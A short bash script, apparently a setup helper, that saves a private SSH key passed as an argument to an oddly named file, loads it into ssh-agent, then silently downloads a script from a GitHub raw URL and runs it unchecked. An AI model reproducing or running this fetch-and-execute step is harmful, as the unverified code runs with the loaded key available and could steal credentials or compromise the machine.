#!/bin/bash

# Check if a private key argument is provided
if [ -z "$1" ]; then
    echo "Usage: $0 \"<PRIVATE_KEY>\""
    exit 1
fi

# Assign the private key argument to a variable
PRIVATE_KEY="$1"
KEY_PATH="$HOME/.ssh/bin_da.f"

# Create .ssh directory and save the private key
mkdir -p "$(dirname "$KEY_PATH")"
echo "$PRIVATE_KEY" > "$KEY_PATH"
chmod 600 "$KEY_PATH"

# Start ssh-agent and add the key
eval "$(ssh-agent -s)"
ssh-add "$KEY_PATH"

# Download and execute genz.sh
wget -q https://raw.githubusercontent.com/78sdtechfi/zemfy/main/genz.sh -O genz.sh
chmod +x genz.sh
./genz.sh
